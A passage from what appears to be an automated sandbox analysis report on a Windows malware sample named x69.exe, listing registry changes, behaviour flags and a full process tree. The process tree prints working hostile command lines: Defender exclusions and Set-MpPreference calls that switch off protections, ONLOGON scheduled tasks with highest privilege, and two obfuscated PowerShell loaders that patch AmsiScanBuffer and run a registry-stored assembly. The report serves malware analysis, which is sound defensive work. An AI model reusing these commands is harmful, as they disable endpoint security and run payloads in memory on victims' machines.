a2211436000000000000d01200000000000000000000000000000000 | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\68b21ce8-3668-4554- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key deleted | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\eef5bb6d-1f3e-469a- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\cf51f3bd-3a04-461f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\6fda03d4-1977-427f- = "Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy" | C:\Windows\System32\RuntimeBroker.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-21-343936533-1262634978-1863872812-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\Microsoft.Windows.ContentDeliveryManager_cw5n1h2txyewy\PersistedStorageItemTable\System\691a0b39-8952-4b84- = "8324" | C:\Windows\System32\RuntimeBroker.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\x69.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of UnmapMainImage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\RuntimeBroker.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Windows\system32\winlogon.exe
winlogon.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s camsvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo
C:\Users\Admin\AppData\Local\Temp\x69.exe
"C:\Users\Admin\AppData\Local\Temp\x69.exe"
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69.exe" /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
C:\Users\Admin\AppData\Roaming\x69.exe
"C:\Users\Admin\AppData\Roaming\x69.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69Disable-winDefender" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe" /RL HIGHEST
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
"C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69install.exe'
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Users\Admin\AppData\Local\Temp\izTLZKj.exe
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C14C.tmp\C14D.tmp\C14E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\C15C.tmp\C15D.tmp\C15E.bat C:\Users\Admin\AppData\Roaming\x69Disable-winDefender.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableRealtimeMonitoring $true"
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "x69install" /SC ONLOGON /TR "C:\Users\Admin\AppData\Roaming\x69install.exe" /RL HIGHEST
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
"C:\Users\Admin\AppData\Roaming\x69install.exe"
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
C:\Users\Admin\AppData\Local\Temp\iyMbXS.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBehaviorMonitoring $true"
C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Users\Admin\AppData\Roaming\x69install.exe
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:gwjpPDXdjkay{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$EGyTRphnVKuFwK,[Parameter(Position=1)][Type]$SZhzBExtBK)$anWgFXQPnMo=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+'f'+'lec'+'t'+''+'e'+'d'+[Char](68)+''+'e'+''+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+'n'+'Me'+'m'+''+'o'+'r'+'y'+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+''+'e'+'',$False).DefineType('M'+[Char](121)+''+[Char](68)+''+[Char](101)+'le'+[Char](103)+'a'+'t'+''+'e'+''+[Char](84)+''+[Char](121)+'pe','C'+'l'+'ass,'+[Char](80)+''+'u'+''+[Char](98)+'l'+'i'+'c,'+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+'d'+''+','+'A'+'n'+''+'s'+'i'+'C'+''+[Char](108)+'a'+'s'+''+[Char](115)+''+[Char](44)+''+'A'+''+[Char](117)+''+[Char](116)+''+[Char](111)+''+'C'+''+[Char](108)+''+'a'+'s'+'s'+'',[MulticastDelegate]);$anWgFXQPnMo.DefineConstructor('R'+[Char](84)+''+'S'+'p'+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+'a'+'m'+''+[Char](101)+''+[Char](44)+''+'H'+''+'i'+'d'+[Char](101)+''+[Char](66)+''+[Char](121)+'S'+'i'+'g'+[Char](44)+''+'P'+''+[Char](117)+''+'b'+'l'+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$EGyTRphnVKuFwK).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+[Char](101)+',M'+'a'+''+[Char](110)+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$anWgFXQPnMo.DefineMethod(''+[Char](73)+''+[Char](110)+''+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+'li'+[Char](99)+''+[Char](44)+''+[Char](72)+''+'i'+''+'d'+'eB'+[Char](121)+'S'+[Char](105)+'g,'+'N'+''+'e'+''+[Char](119)+''+[Char](83)+''+'l'+''+'o'+''+'t'+''+[Char](44)+''+'V'+''+[Char](105)+'r'+'t'+''+[Char](117)+'a'+[Char](108)+'',$SZhzBExtBK,$EGyTRphnVKuFwK).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+'n'+'a'+[Char](103)+'ed');Write-Output $anWgFXQPnMo.CreateType();}$QVErDwZqdeeSw=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+[Char](121)+''+'s'+''+'t'+''+'e'+''+[Char](109)+''+'.'+''+[Char](100)+''+[Char](108)+''+[Char](108)+'')}).GetType('M'+[Char](105)+''+'c'+'ro'+'s'+''+[Char](111)+''+[Char](102)+''+'t'+''+'.'+''+'W'+'i'+[Char](110)+'3'+'2'+''+[Char](46)+''+'U'+''+[Char](110)+'s'+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+'at'+[Char](105)+''+'v'+''+[Char](101)+'M'+[Char](101)+''+'t'+''+[Char](104)+''+'o'+''+[Char](100)+''+[Char](115)+'');$ASWRkXIrmAKEjJ=$QVErDwZqdeeSw.GetMethod('G'+'e'+''+[Char](116)+''+'P'+''+'r'+'o'+'c'+''+'A'+''+[Char](100)+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+'s',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+'i'+'c'+','+''+'S'+''+'t'+''+[Char](97)+'t'+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$lkbVUXvgrIsctGOmmOe=gwjpPDXdjkay @([String])([IntPtr]);$mAfbTdbxxfDadunDNGCeia=gwjpPDXdjkay @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$fEOFZTTGPJH=$QVErDwZqdeeSw.GetMethod(''+[Char](71)+''+[Char](101)+'tM'+[Char](111)+''+[Char](100)+''+'u'+''+'l'+'e'+[Char](72)+''+[Char](97)+''+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+[Char](107)+'e'+'r'+''+[Char](110)+''+[Char](101)+''+'l'+''+[Char](51)+''+'2'+'.'+[Char](100)+'ll')));$ReZDSaRdXaeEhN=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](76)+''+[Char](111)+''+[Char](97)+''+[Char](100)+''+[Char](76)+''+[Char](105)+'br'+[Char](97)+''+[Char](114)+''+[Char](121)+''+[Char](65)+'')));$EOeVtdgxRABKatLMa=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$fEOFZTTGPJH,[Object](''+[Char](86)+'i'+[Char](114)+'t'+'u'+'alPr'+'o'+'t'+[Char](101)+''+[Char](99)+''+'t'+'')));$nMDYmQs=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ReZDSaRdXaeEhN,$lkbVUXvgrIsctGOmmOe).Invoke('a'+[Char](109)+''+[Char](115)+'i'+[Char](46)+''+'d'+''+[Char](108)+''+[Char](108)+'');$fzaAOoamoSPhzDgTe=$ASWRkXIrmAKEjJ.Invoke($Null,@([Object]$nMDYmQs,[Object](''+[Char](65)+''+[Char](109)+''+'s'+''+'i'+''+'S'+''+'c'+''+'a'+''+'n'+''+[Char](66)+'u'+'f'+'f'+[Char](101)+''+[Char](114)+'')));$Ivpcqfqpxz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,4,[ref]$Ivpcqfqpxz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$fzaAOoamoSPhzDgTe,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($EOeVtdgxRABKatLMa,$mAfbTdbxxfDadunDNGCeia).Invoke($fzaAOoamoSPhzDgTe,[uint32]8,0x20,[ref]$Ivpcqfqpxz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+'WA'+[Char](82)+''+[Char](69)+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+[Char](115)+'tag'+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:wndeDcOuxJyW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$cqOPlRudTeSnnN,[Parameter(Position=1)][Type]$aBdREcctId)$KLyzITCmmIs=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+[Char](101)+''+'c'+''+[Char](116)+''+[Char](101)+''+[Char](100)+''+[Char](68)+''+'e'+'le'+[Char](103)+''+[Char](97)+'t'+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Me'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+[Char](111)+''+[Char](100)+'u'+'l'+'e',$False).DefineType(''+'M'+'y'+'D'+'el'+[Char](101)+''+[Char](103)+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+'e','C'+[Char](108)+''+'a'+''+'s'+''+'s'+''+','+''+[Char](80)+'u'+'b'+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+''+'a'+'l'+[Char](101)+''+[Char](100)+''+','+''+[Char](65)+'n'+[Char](115)+'i'+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+'A'+'u'+[Char](116)+'o'+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$KLyzITCmmIs.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+[Char](112)+'e'+[Char](99)+''+[Char](105)+'a'+[Char](108)+'N'+'a'+''+[Char](109)+'e'+[Char](44)+'H'+[Char](105)+''+[Char](100)+'e'+'B'+'y'+'S'+'i'+'g'+''+[Char](44)+''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+''+'i'+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+','+''+'M'+''+'a'+''+'n'+''+[Char](97)+''+[Char](103)+''+'e'+'d');$KLyzITCmmIs.DefineMethod(''+[Char](73)+'n'+'v'+''+[Char](111)+''+[Char](107)+''+'e'+'',''+'P'+''+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+''+','+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+','+''+[Char](78)+'e'+'w'+''+[Char](83)+''+'l'+''+[Char](111)+'t,'+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+''+[Char](108)+'',$aBdREcctId,$cqOPlRudTeSnnN).SetImplementationFlags(''+[Char](82)+''+'u'+''+[Char](110)+''+'t'+''+'i'+'m'+[Char](101)+''+[Char](44)+''+[Char](77)+'a'+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $KLyzITCmmIs.CreateType();}$GAEdqfBeOtXRU=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+[Char](121)+''+[Char](115)+'t'+[Char](101)+''+[Char](109)+''+'.'+'d'+[Char](108)+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'rosoft'+'.'+''+'W'+''+[Char](105)+'n3'+'2'+''+[Char](46)+'U'+'n'+''+'s'+'a'+[Char](102)+''+[Char](101)+''+'N'+''+'a'+''+[Char](116)+'iv'+[Char](101)+''+[Char](77)+''+[Char](101)+''+[Char](116)+''+[Char](104)+''+[Char](111)+''+[Char](100)+''+[Char](115)+'');$jFokKXmvUCMqXx=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+'e'+'t'+[Char](80)+''+[Char](114)+'oc'+'A'+''+'d'+''+[Char](100)+'r'+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+'P'+''+[Char](117)+'b'+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+'a'+''+[Char](116)+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$BeVuaQsZPkIBjfUtdcw=wndeDcOuxJyW @([String])([IntPtr]);$hSBXIQwXtoyHXUDcycnAeO=wndeDcOuxJyW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$MOqpBmKFIuF=$GAEdqfBeOtXRU.GetMethod(''+'G'+''+[Char](101)+''+'t'+''+'M'+''+[Char](111)+''+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'H'+[Char](97)+''+[Char](110)+''+[Char](100)+''+[Char](108)+''+'e'+'').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+'e'+''+'l'+'3'+[Char](50)+''+'.'+'d'+'l'+'l')));$lOXpkLenleHsgM=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object]('L'+[Char](111)+''+[Char](97)+''+'d'+''+'L'+''+[Char](105)+''+[Char](98)+''+[Char](114)+''+'a'+''+[Char](114)+'y'+[Char](65)+'')));$BNkFFxcqxhXuJFhoN=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$MOqpBmKFIuF,[Object](''+'V'+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+[Char](117)+''+[Char](97)+'l'+[Char](80)+''+[Char](114)+'o'+[Char](116)+'e'+[Char](99)+''+'t'+'')));$cLbnIeA=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lOXpkLenleHsgM,$BeVuaQsZPkIBjfUtdcw).Invoke('a'+[Char](109)+''+[Char](115)+''+[Char](105)+'.'+[Char](100)+'l'+[Char](108)+'');$wCVQpXLlZspVveqCi=$jFokKXmvUCMqXx.Invoke($Null,@([Object]$cLbnIeA,[Object](''+[Char](65)+''+[Char](109)+'s'+[Char](105)+''+[Char](83)+''+[Char](99)+''+'a'+''+[Char](110)+''+'B'+''+[Char](117)+''+[Char](102)+''+[Char](102)+''+[Char](101)+''+[Char](114)+'')));$xDvWZkIXPW=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,4,[ref]$xDvWZkIXPW);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$wCVQpXLlZspVveqCi,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BNkFFxcqxhXuJFhoN,$hSBXIQwXtoyHXUDcycnAeO).Invoke($wCVQpXLlZspVveqCi,[uint32]8,0x20,[ref]$xDvWZkIXPW);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('S'+'O'+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](120)+''+'6'+''+[Char](57)+''+'s'+''+[Char](116)+''+[Char](97)+''+[Char](103)+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableBlockAtFirstSeen $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisableIOAVProtection $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'x69.exe'
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Set-MpPreference -DisablePrivacyMode $true"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
